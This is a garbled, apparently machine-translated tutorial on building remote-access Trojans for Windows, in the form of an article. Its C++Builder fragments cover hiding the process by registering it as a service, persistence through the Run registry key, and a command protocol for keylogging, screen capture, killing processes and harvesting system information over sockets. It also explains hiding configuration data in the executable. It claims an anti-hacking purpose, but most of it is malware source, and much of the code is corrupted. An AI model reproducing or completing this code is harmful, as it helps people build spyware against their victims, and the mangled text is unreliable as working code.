In recent years, hacker technology has been ripe, which has caused great threat to cyber security, and the main attack measures of hackers.
One, that is, using Trojan technology, penetrates into the other party's host system, thereby implementing the remote operation target host.
Its destructive power is, it is inspiring, how hacker has created this kind of destructive Trojan
, Below, I have a detailed analysis of the source code level for Trojans, let us do a thorough development technology for Trojans.
Perspective, from understanding wood horse technology, more securely manages its computer.
1. Simple talk about Trojan's classification
Since the development of Trojan program technology, it has experienced 4 generations, the first generation, that is, simple password stealing, sending, etc.
What is special. The second generation of Trojans, has a great progress in technology, and the ice river can be said to be domestic Trojan.
One of the typical representatives. The third generation of Trojans has made a small improvement in data delivery technologies, and ICMP has occurred.
Trojans, use malformation packets to deliver data, increase the difficulty of killing. The fourth generation of Trojans is hidden in the process,
A large change, using the kernel plug-in embedded method, using remote insertion thread technology, embedding the DLL thread.
Or hook PSAPI, realize hidden horses, even under Windows NT / 2000, has reached a good hidden
Tibetan effect. I believe that the fifth generation Trojan will soon be prepared. About more detailed instructions, you can refer to SHOT
Gun's article. "Uncover the mystery of Trojans"
http://www.patching.net)
2. Trojan's hidden technology
Trojan's server side, in order to avoid being found, most of them have to hide, let us take a look
How is hidden hidden.
Speaking of hidden, first understand three related concepts: processes, threads and services. I will explain it.
Process: a normal Windows application, after running, you will have a process among the system.
At the same time, each process corresponds to a different PID (Progress ID, Process Identifier).
Will be assigned a virtual memory space address segment, all related program operations, will be in this virtual empty
During the room.
Thread: A process, there can be one or more threads, and multiple operations are executed synchronously between threads, generally, line
The process is independent of each other. When a thread is wrong, it does not necessarily lead to the crash of the entire process.
Service: A process works in a service manner, it will work in the background, will not appear in the task
In the list, however, under Windows NT / 2000, you can still check any server through the Service Manager.
Whether or not the order is started.
If you want to hide the server side of the Trojan, you can pseudo hide or hide. Pseudo-hidden, that is,
The process still exists, just let him disappear in the list of processes. It's really hidden to make the program disappear, not
A process or service work.
Pseudo-hidden methods are easier to implement, as long as the procedure of the Trojan server is registered as a service
In this way, the program will disappear from the task list, because the system does not think he is a process, when Ctrl is pressed
ALT DELETE, you can't see this program. However, this method only applies to Windows9x systems
For Windows NT, Windows 2000, etc., you will find the service you registered in the system through the service manager. Is the pseudo-hidden approach really can't be used under Windows NT / 2000? Of course, there is also a way.
That is the interception technology of the API, through the establishment of a background system hook, intercepts PSAPI's EnumProcessModules
The related functions are controlled to the translation of the traversal call to the process and services, when the process ID (PID) is Trojan
The server's server-side process is jumped directly, so that the process is hidden, Jinshan Wheel, etc.
It is a similar approach to intercept the TextOuta, TextoutW function, intercept screen output, realize instant translation.
of. Similarly, this method can also be hidden in the process.
When the process is really hidden, then after the server of this Trojan is running, it should not be generally
The process should not be available, that is, completely soluble the system's kernel. Maybe you will feel strange
, Is it necessary to have a process after the application is running? Indeed, so we can't
Do him into an app, do him as a thread, a thread of another application, injection itself
The address space of other applications. And this app is an absolutely safe program for the system.
In order to achieve a complete hidden effect, such results have led to an increase in the difficulty of killing hackers.
For safety reasons, I only give a method of implementing process pseudo-hidden methods through registration services. For more complex
Advanced hidden methods, such as a way to insert other processes, see Shotgun's article. "NT
Hide and testing of underwater horses process
http://www.patching.net)
WinApi Winmain (Hinstance, Hinstance, LPSTR, INT)
{
Try
{
DWORD dWVersion = getVersion (); // get the version number of Windows
IF (dWVersion> = 0x80000000) // Windows 9x hidden task list
{
INT (Callback * RSP) (DWORD, DWORD);
Hinstance DLL = LoadLibrary ("kernel32.dll"); // Load Kernel32.dll
RSP = (int (Callback *) (DWORD, DWORD)) GetProcAddress
(DLL, "RegisterServiceProcess");
/ / Find the entrance of RegisterServiceProcess
RSP (NULL, 1); // Register Service
Freelibrary (DLL); // Release DLL module
}
}
Catch (Exception & Exception) // Handling Exception Event
{
// Treat an exception event
}
Return 0;
}
3. Self-loading operation technology of procedures
Make the program self-running method, in addition to the most common method: load the program to the startup group, write the program
HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONS to the registry
There are still many other ways, and there are dozens of methods, such as Yagami.
Modify Boot.ini, or directly mount the input method values in the registration table, by modifying the method of the Explorer.exe startup parameters, etc., it can really be said to be anti-fight, the following shows a paragraph
HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONSRUN key value
Since started procedures:
Self-loading part:
HKEY HKEY;
Ansistring newprogramname = Ansistring (sys) ANSISSTISTRING ("/") PNAME;
Unsigned long k;
K = reg_opened_existing_key;
RegcreateKeyex (HKEY_LOCAL_MACHINE,
"Software / Microsoft / Windows / Currentversion / Run /",
0L,
NULL,
REG_OPTION_NON_VOLATILE, Key_All_Access | key_set_value,
NULL,
& HKEY, & K);
RegSetValueex (HKEY,
"Backgroup",
0,
REG_SZ,
NewProgramname.c_str (),
NewProgramname.length ());
RegcloseKey (HKEY);
IF (int (shellexecute (Handle,
"open",
NewProgramname.c_str (),
NULL,
NULL,
SW_HIDE))> 32)
{
Wantclose = True;
CLOSE ();
}
Else
{
HKEY HKEY;
Unsigned long k;
K = reg_opened_existing_key;
Long a = regcreateKeyex (HKEY_LOCAL_MACHINE,
"Software / Microsoft / Windows / Currentversion / Run",
0,
NULL,
REG_OPTION_NON_VOLATILE,
Key_Set_Value, NULL,
& HKEY, & K);
RegSetValueex (HKEY,
"Backgroup",
0,
REG_SZ,
Programname.c_str (),
ProgramName.length ());
INT NUM = 0;
Char Str [20];
DWORD LTH = 20;
DWORD TYPE;
Char STRV [255];
DWORD VL = 254;
DWORD SUC;
Do {
SUC = RegenumValue (HKEY_LOCAL_MACHINE,
(DWORD) NUM, STR,
NULL, & Type, STRV, & VL); IF (strcmp (str, "bgroup") == 0) { DELETEFILE (ANSISSTRING (STRV)); Regdeletevalue (HKEY_LOCAL_MACHINE, "BGROUP"); Break; } } while (SUC == Error_Success); RegcloseKey (HKEY); } Uninstall code from the loading program: Int Num; CHAR STR2 [20]; DWORD LTH = 20; DWORD TYPE; Char STRV [255]; DWORD VL = 254; DWORD SUC; Do { Suc = RegenumValue (HKEY_LOCAL_MACHINE, (DWORD) NUM, Str, NULL, & Type, STRV, & vl); IF (strcmp (str, "bgroup") == 0) { DELETEFILE (ANSISSTRING (STRV)); Regdeletevalue (HKEY_LOCAL_MACHINE, "BGROUP"); Break; } While (SUC == Error_Success) HKEY HKEY; Unsigned long k; K = reg_opened_existing_key; RegcreateKeyex (HKEY_LOCAL_MACHINE, "Software / Microsoft / Windows / Currentversion / Run", 0, NULL, REG_OPTION_NON_VOLATILE, Key_Set_Value, NULL, & HKey, & k); Do { Suc = RegenUMValue (HKEY, (DWORD) NUM, STR, IF (strcmp (str, "backgroup") == 0) { DELETEFILE (ANSISSTRING (STRV)); Regdeletevalue (HKEY_LOCAL_MACHINE, "backgroup"); Break; } While (SUC == Error_Success) RegcloseKey (HKEY); The self-loading portion can be written with C Builder, which will be simplified: Tregistry & regkey = * new tregistry (); Regkey.rootkey = HKEY_LOCAL_MACHINE Regkey.openkey ("Software / Microsoft / Windows / CurrentVersion / Run", TRUE); IF (! Regkey.Valueexists ("Interbase Server")) { Regkey.writestring ("Interbase Server", "D: / Program Files / Borland / IntrBase / BIN / IBSERVER.EXE"); } RegKey.closeKey (); Delete ®Key; 4. Hide of the establishment of Trojans There are many data transfer methods for Trojans, and the most common ways to be TCP, UDP transmission data. Usually, using Winsock and the specified port of the target machine, using the API, etc. of Send and RECV. Data transmission, but due to the worse hiddenness of this method, it is often easy to view some tool software. To, the easiest, such as using the netstat command in the command line, you can check the current activity TCP UDP connection. C: Documents and Settingsigball> NetStat -n Active Connections Proto Local Address Foreign Address State TCP 192.0.0.9:1032 64.4.13.48:1863 Establish TCP 192.0.0.9:9:1112 61.141.212.95:80 Established TCP 192.0.0.9:9:935 202.130.239.223:80 Establishedtcp 192.0.0.9:9:1142 202.130.239.223:80 Establish TCP 192.0.0.9:1162 192.0.0.8:139 Time_Wait TCP 192.0.0.9:9:1169 202.130.239.159:80 ESTABLISHED TCP 192.0.0.9:9:1170 202.130.239.133:80 Time_wait C: Documents and Settingsigball> NetStat -a Active Connections Proto Local Address Foreign Address State TCP LiUMy: Echo Liuny: 0 listenging TCP LiUMy: 0 listenging TCP LiUMy: daytime liumy: 0 listening TCP LiUMy: qotd liumy: 0 listenging TCP LiUMy: Chargen Liumy: 0 listening TCP LiUMy: EPMAP LiUMy: 0 listenging TCP LiUMy: Microsoft-DS Liumy: 0 listening TCP LiUMy: 1025 liumy: 0 listenging TCP Liumy: 1026 liumphy: 0 listening TCP LiUMy: 1031 liumy: 0 listenging TCP LiUMy: 1032 liumphy: 0 listenging TCP LiUMy: 1112 liumy: 0 listening TCP LiUMy: 1135 liumy: 0 listenging TCP LiUMy: 1142 liumy: 0 listenging TCP LiUMy: 1801 liumy: 0 listening TCP LiUMy: 3372 liumy: 0 listenging TCP LiUMy: 3389 liumy: 0 listenging TCP LiUMy: NetBIOS-SSN LiUMy: 0 listening TCP LiUMy: 1028 liumy: 0 listenging TCP LiUMy: 1032 msgr-ns19.msgr.hotmail.com:1863 ESTAB TCP LiUMy: 1112 szptt61.141.szptt.net.cn: http establi TCP LiUMy: 1135 202.130.239.223:Http Establish TCP LiUMy: 1142 202.130.239.223:Http Establish TCP LiUMy: 1162 W3i: NetBIOS-SSN TIME_WAIT TCP Liumy: 1170 202.130.239.133:Http Time_Wait TCP LiUMy: 2103 liumy: 0 listengingTCP Liumy: 2105 liumy: 0 listenging TCP LiUMy: 2107 liumy: 0 listenging UDP LiUMy: echo *: * UDP LiUMy: Discard *: * UDP liumy: daytime *: * UDP LiUMy: qotd *: * UDP liumy: chargen *: * UDP LiUMy: EPMAP *: * UDP LiUMy: snmp *: * UDP LiUMy: Microsoft-DS *: * UDP Liumy: 1027 *: * UDP LiUMy: 1029 *: * UDP LiUMy: 3527 *: * UDP liumphy: 4000 *: * UDP LiUMy: 4001 *: * UDP LiUMy: 1033 *: * UDP LiUMy: 1148 *: * UDP LiUMy: NetBIOS-NS *: * UDP LiUMy: NetBIOS-DGM *: * UDP LiUMy: isakmp *: * However, hackers still use various means to avoid this reconnaissance, there are probably two kinds of methods I know, one It is a combined port method, that is, use special means, bind two TCP or UDP simultaneously on a port. Connect, this sounds incredible, but in fact, there have been programs using similar methods , By binding his Trojan port above the specific service port, (such as HTTP of the 80 port, who is arguing What is the suspect to be a Trojan? ) Thus reaching the hidden port. Another way is to use ICMP (in Ternet Control Message Protocol) The protocol is transmitted, the principle is to modify the structure of the ICMP header , Add Trojans to control fields, such Trojans, have a lot of new features, not occupying the characteristics of the port, use The household is difficult to find out, while using ICMP can penetrate some firewalls, thereby increasing the difficulty of prevention. Reason Have this feature because ICMP is different from TCP, UDP, ICMP works in the network application layer does not use TCP protocol . About the structure of the network level, here is given below: Network hierarchical map 5. Organization method for transmitting data The organization of data can be said to be mathematical problems. The key is to transmit data reliability, pressure Tract, and high efficiency lines. Trojans, in order to avoid being found, you must control the amount of data transfer, one Prepare better Trojans often have its own set of transport agreements, then how to organize the implementation ? Below, I will pack some protocols: Typedef struct {// Define message structure // char ip [20]; CHAR TYPE; // message type Char Password [20]; // password INT CNUM; // message operation number // int layth; // message length } Msg; #define msglen sizeof (MSG) // ----------------------------------------- // dialog box data Package definition: DLG_MSG_TYPE.H // ------------------------------------------- // Define the following message type: #define msgdlgcommon 4 // Connection event #define msgdlgsend 5 // Send completion events // Message structure Typedef struct { Char Name [20]; // Dialog Title Char msg [256]; // dialog message content } Msgdlguint; #define msgdlglen sizeof (msgdlguint) // Message unit length // ------------------------------------------ // Chat packet definition: chat_msg_type.h // ------------------------------------------ // Define the following message type: #define msgchatcommon 0 // Connection event #define msgchatconnect 1 // Access event #define msgchatescept 2 // End Event #define msgcHatReceived 16 // Confirm the content of the conversation // Message structure Typedef struct { Char ClientName [20]; // Client Custom Name Char msg [256]; // Send message } Msgchatuint; #define msgchatlen sizeof (msgchatuint) // Message unit length // ------------------------------------------ // Restart the packet definition: reboot_msg_type.h // ------------------------------------------ // Define the following message type: #define msgreboot 15 // Restart event // ------------------------------------------ // Directory structure request packet definition: DIR_MSG_TYPE.H // ------------------------------------------ // Define the following message type: #define msggetdirinfo 17 #define msgreceivegetdirInfo 18 Typedef struct { Char Dir [4096]; // You want the directory name } Msgdiruint; #define msgdiruintlen sizeof (msgdiruint) // TCP MSG Typedef struct {// Define message structure Char style; // message type Char Spassword [20]; // password // int SNUM; // message operation number Char * allmsg; } SMSG; #define smsglen sizeof (SMSG) #define msglistprogram 19 #define msgflymouse 21 #define msggowithmouse 22 #define msgsaveKey 23 #define msgtracekey 24 #define msgcopyscreen 25 // TCP Receive message, UDP request message #define msgcopywindow 26 // ------------------------- // Mouse pointer hide and display control // ------------------------- #define msgsetmousestat 27 // Set message #define msgmouseestat 28 // Successful message Typedef struct {bool mouseshow; } MsgsetMousestatuint; #define msgsetMouseStatuintlen SizeOf (MsgSetMouseStatuint) // ------------------------- // Taskbar hide and display control // ------------------------- #define msgsettaskbarstat 29 // Set message #define msgtaskbarstat 30 // Success message Typedef struct { Bool taskshow; } MsgSettaskbarstatuint; #define msgsettaskbarstatuintlen sizeof (MsgSettaskbarstatuint) // ------------------------- // Get the name of the machine // ------------------------- #define msggetnetbiosName 31 // Request #define msgnetbiosname 32 // Return the machine name Typedef struct { Char NetBiosName [128]; } Msgnetbiosnameuint; #define msgnetbiosNameuintlen Sizeof (MsgnetBiosNameuint) // ------------------------- // Turn off the process! // ------------------------- #define msgSetProgramClose 33 // Close request #define msgprogramClosed 34 // Success message ----- Typedef struct { CHAR Program [4096]; // Old Struct: char program [128]; // The name of the window to close MsgSetProgramCloseuN; #define msgSetProgramCloseuintlen SizeOf (MsgSetProgramCloseu)) // ------------------------- // Open the process change! // ------------------------- #define msgsetProgramOpen 20 // Open request #define msgprogrampened 36 // Success message Typedef struct { Char programname [4096]; // old struct: char program [128]; // To open The name of the program Bool programshow; // front desk running or background running program (hidden running) } MsgSetProgramopenuint; #define msgsetProgramopenuintlen Sizeof (MsgSetProgramopenu)) #define msggethardware 35 // Request Hardware Information (UDP Message) and Recycling Hardware Information (TCP Message) The above definition is used to use TCP and UDP's objective to reduce the chance of TCP connections. The system resources will be less, it is not easy to let the target aware. Many Trojans are like the above definitions. The likelihood is defined, where it is to prevent non-real client connection requests. SNUM for message The work number, its role is to test whether the data is sent. After analysis, we are familiar with OICQ is also It is used to check the message using this approach. The data protocol is organized, and there is another step in work, that is, the packaging transmission of the data, the general method is to put all the data Press the data stream of a void type, then send: Msg * msg = new msg; TmemoryStream * rdata = new tmemorystream; nmudp1-> readstream (RDATA); RDATA-> Read (MSG, SIZEOF (MSG)); UDPConnect * udpConnect = new udpConnect; NetbiosName * NetbiosName = New NetbiosName IF (msg-> cnum == cnumbak) Return; Else { CNUMBAK = MSG-> CNUM; Switch (msg-> type) { Case 0: // msgudpConnect RDATA-> Read (UDPConnect, SizeOf (UDPConnect)); Checkuser (udpConnect-> isright); Break; Case 1: RDATA-> Read (NetbiosName, Sizeof (NetBiosName); Ansistring JQM = "Machine Name"; JQM = (ANSISUSTRING) NetBiosName-> NetBiosName Memo2-> Lines-> Add (jqm); Break; } } When the server is received, the first thing to do is to unpack the reduced VOID stream as a structured protocol, here is the same Give an example code: Nmudp1-> remotehost = fromip; NMudp1-> RemotEport = Port; TmemoryStream * RDATA = New TMEMORYSTREAM; NMUDP1-> Readstream (RDATA); Msg * msg = new msg; RDATA-> Read (MSG, SIZEOF (MSG)); IF (msg-> cnum == cnumbak) Return; Else { CNUMBAK = MSG-> CNUM; Switch (msg-> type) { Case 0: Checkuser (MSG-> Password); Break; Case 1: GetNetbiosName (); Break; Case 2: Checkhard (); Break; } } In addition, many Trojans support the function of the screen, the fundamental principle is to capture the screen picture, then Back to the client, because the data volume is large, many Trojans are only when the screen changes. Recycling changes to the picture, the common means is the minimum rectangular method, the following algorithm is known as an ancient legend: #define maxxcount 10 // screen X direction maximum number of split blocks #define maxycount 5 // ... y .............. #define destnum 1000 // The maximum number of offset detection points per piece ColorRef Colors [MAXXCOUNT] [MAXYCOUNT] [DESTNUM]; ColorRef Bakcolors [MAXXCOUNT] {MAXYCOUNT] [DESTNUM]; TPOINT DESTS [DESTNUM]; int S; Int sh; Int xcount; Int Ycount; INT ITEMWIDTH; INT ITEMHEIGHT; Int DNUM; int qlity; // After getting the message: // Different: DNUM, QLITY is analyzed in the received packet // DNUM: Number of offset observations // qlity: image requirements __fastcall tform1 :: copyScreen (int dnum, int qlity) {itemwidth = sw / xcount; Itemheight = sh / ycount; SW = screen-> width; SH = Screen-> Height; Xcount = (SW> 1000)? 8: 6; Ycount = (SH> 1000)? 3: 2; For (int Num1 = 0; Num1width = S; BM-> height = sh; Bitblt (BM-> Canvas-> Handle, 0, 0, SW-1, SH-1, DC, 0, 0); INT NUM1, NUM2, NUM3; Int nowx, nowy; BOOL CHANGE; Bool itemchange [maxXcount] [MAXYCOUNT]; For (Num1 = 0; Num1canvas-> Pixels [NOWX DESTS [NUM3] .x] [NOWY DESTS [Num3] .y]. IF (Colors [Num1] [Num2] [Num3]! = Bakcolors [Num1] [Num2] [Num3]) { Bakcolors [Num1] [Num2] [Num3] = Colors [Num1] [Num2] [Num3]; ItemChange [Num1] [Num2] = true; } } } } INT CNUM, Maxcnum; INT CHANGEDNUM = 0; TRECT * RECT; Int Num4; INT minsize = 10000; Int m; TRECT MINRECT; Graphics :: tbitmap * bt2 = new graphics :: tbitmap TJPEGIMAGE * J = New TJPEGIMAGE; // ******************************* J-> QUALITY = QLITY // ******************************* CopyScreenuint CopyScreen CopyScreenItemUint CopyScreenItem TMEMORYSTREAM * MS = New TMEMORYSTREAM; MS-> WRITE (& TCPMSG, SIZEOF (TCPMSGUINT)); MS-> Write (& COPYSCREEN, SIZEOF (COPYSCREENUINT)); Do { FOR (Num1 = 0; Num1maxcnum) Maxcnum = CNUM; M = (Num3-Num1) * (NUM4-NUM2); IF (2 * m-cnumcanvas-> handle, 0, 0, itemwidth-1, itemheight-1, bt-> canvas-> handle, 0, 0); J-> Assign (BT2); J-> SaveTroupTream (MS2); CopyScreenItem.rect = TRECT (Num1, Num2, Num3, Num4); CopyScreenItem.filetype = jpegfile; // jpegfile is defined as: #define JPEGFILE 1 MS2-> POSITION = 0; CopyScreenItem.length = ms2-> size; MS-> WRITE (& COPYSCREENITEM, SIZEOF (ScreenItemuint); MS-> CopyFrom (ms2, ms2-> size); Changednum ; WHILE (MAXCNUM> 0); TCPMsg.Type = msgcopyscreen; ms-> POSITION = 0; TCPMSG.LENGTH = MS-> Size-sizeof (tcpmsguint); CopyScreen.count = ChangedNum; MS-> WRITE (& TCPMSG, SIZEOF (TCPMSGUINT)); MS-> Write (& COPYSCREEN, SIZEOF (COPYSCREENUINT)); MS-> POSITION = 0; SOCK-> SendStream (MS); } This program cuts the screen screen into multiple parts, and stores the screen as JPG format, which changes the compression ratio. Very high. By compressing the processed data through this method, it becomes very small, even in the screen has not changed. In the case, the amount of data transmitted is 0, and there is not much analysis here, interested friends can take a look. 6. Get of the target machine Compared to the above part, the method implemented here is much simpler, this segment will be relaxed, general Getting the method of the machine is to call the associated API, this is very similar to the application. ANSISTRING CS; File * fp; FP = fopen ("Temp.had", "W "); // Todo: Add your source code here // Get the CPU model System_info systeminfo; GetSystemInfo (& SystemInfo); CS = "CPU type is:" string (systeminfo.dwprocessortype) " " FWRITE (cs.c_str (), cs.length (), 1, fp); MemoryStatus memory; Memory.dwlength = sizeof (memory); // Initialization GlobalMemoryStatus (& Memory); CS = "Physical Memory is (MB):" String (INT (Memory.dwtotalphys / 1024/1024)) " " FWRITE (cs.c_str (), cs.length (), 1, fp); Cs = "Available Memory is (KB):" String (int (Memory.dwavailphys / 1024)) " " FWRITE (cs.c_str (), cs.length (), 1, fp); DWORD SECTOR, BYTE, Cluster, Free; Long Int FreeSpace, Totalspace; Uint type; CHAR NAME; // 0- Unknown Disk, 1- does not exist, 2-removable disk, 3-fixed disk, 4-network disk, // 5-CD-ROM, 6-memory virtual disk Char Volname [255], FileName [100]; // Buffer [512]; DWORD SNO, MAXL, FILEFLAG; For (name = 'a'; name <= 'z'; name ) {// cycle detection a ~ z Type = getDriveType (Ansistring (Ansistring (Name) ':'). c_str ()); // Get disk type IF (Type == 0) { CS = "Unknown Type Disk:" String (Name) " " FWrite (cs.c_str (), cs.length (), 1, fp); Else if (Type == 2) { CS = "removable type disk:" String (name) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } Else if (Type == 3) { CS = "Fixed Disk:" String (Name) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } ELSE IF (Type == 4) { CS = "Network Mapping Disk:" String (Name) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } Else if (Type == 5) { CS = "CD-ROM:" String (Name) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } Else if (Type == 6) { CS = "Memory Virtual Disk:" String (Name) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } IF (GetVolumeInformation). c_str (), Volname, 255, & Sno, & Maxl, & Fileflag, FileName, 100)) { CS = String (Name) "Disk Tag:" String (Volname) " " FWRITE (cs.c_str (), cs.length (), 1, fp); CS = string (name) "disk serial number is:" String (SNO) " " FWRITE (cs.c_str (), cs.length (), 1, fp); GetDiskFreespace (String (Name) String (':' )). c_str (), §OR, & BYTE, & Free, & Cluster); // Get return parameters Totalspace = int (cluster) * Byte * SECTOR / 1024/1024; // Calculation total capacity Freespace = int (free) * byte * Sector / 1024/1024; // Calculate free space CS = string (name) string (':') "disk total space (MB):" ANSISTRING (Totalspace) " " FWRITE (cs.c_str (), cs.length (), 1, fp); CS = String (Name) String (':') "Dish Space (MB):" Ansistring (FreeSpace) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } } INT Wavedevice, Mididevice; Waveoutcaps Wavecap; Midioutcaps Midicap; WaveDevice = (int) WaveoutGetNumdevs (); // Waveform device information Mididevice = (int) midiOutGetNumdevs (); // MIDI device information if (WaveDevice! = 0) { WaveOutgetDevcaps (0, & Wavecap, Sizeof (WaveoutCaps); CS = "Current Warm Device:" String (Wavecap.szpname) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } IF (MIDIDEVICE! = 0) { MIDIOUTGETDEVCAPS (0, & Midicap, Sizeof (Midioutcaps); CS = "Current MIDI device:" string (midicap.szpname) " " FWRITE (cs.c_str (), cs.length (), 1, fp); } Long Double TCS; Long Double TC; Long Int BPP, CP; Cs = "Current resolution is:" string (screen-> width) Ansistring ("*") string (screen-> height) " " FWRITE (cs.c_str (), cs.length (), 1, fp); BPP = getDevicecaps (canvas-> handle, bitspixel); TCS = POW (2, bpp); // Calculate the gradient number of colors CP = getDeviceCaps (Form1-> Canvas-> Handle, Plaso); Tc = Pow (Double (TCS), Double (CP)); / / Calculating color depth Ansistring sss; SSS = BPP; CS = "The current color is:" SSS " " FWRITE (cs.c_str (), cs.length (), 1, fp); Fclose (fp); Ansistring filename = "temp.had"; CHAR * BUF; TCPMSGUINT MSG2; STRCPY (Msg2.tpassword, Password); TMEMORYSTREAM * MS = New TMEMORYSTREAM; MS-> CLEAR (); IF (! FileExists (fileEname)) checkhard (); TFileStream * fs = new TFileStream (FileName, FmopenRead); BUF = New char [fs-> size sizeof (tcpmsguint) 1]; FS-> read (buf, fs-> size); Msg2.type = msggethardware; Msg2.Length = fs-> size; FILECLOSE (fs-> handle); MS-> Write (& MSG2, SIZEOF (TCPMSGUINT)); MS-> Write (buf, msg2.length); MS-> POSITION = 0; DELETE [] BUF; Try { SOCK-> SendStream (MS); } Catch (Exception & E) { } } As a program, it basically takes the relevant system information. 7. Server-side program packaging and encryption People who have used the Ice King know that the ice river allows the user to customize the port number. The purpose of this is to prevent it from being reversed What is the function of the black program? Let us first make an experiment: Do as follows in command line mode of Windows 1) C:> Copy Server.exe Server.bak 2) Establish a text file Test.txt, its content is " http://www.patching.net " 3) C:> Type text.txt >> Server.exe 4) Run Server.exe how about it? Is it found that server.exe still can still run? The mysteries of Trojans servers are here: First, it has become an exe file. There is an operation of reading the contents of your own process, reading, files in this EXE file. The pointer directly points to the end of the process, acquires user-customized information from the last countdown n byte, such as port numbers. Wait, then pass to the relevant part of the program for processing. Not given the relevant code part here, interested friends please Refer to some file package code, the technique it uses is small. 8. to sum up Some techniques described above, basically include all the second-generation Trojan characteristics, individual Trojan Support Services List, macro propagation, etc. With the continuous update and development of technology, I believe that from the fifth generation Now the days are not far away, black and anti-black, so reciprocated, it seems that the road to anti-black work is still very long. Since the root attack, the Trojan is only started from our own understanding of the Trojan, I hope this article is after you read. Can bring you some anti-black technical assistance
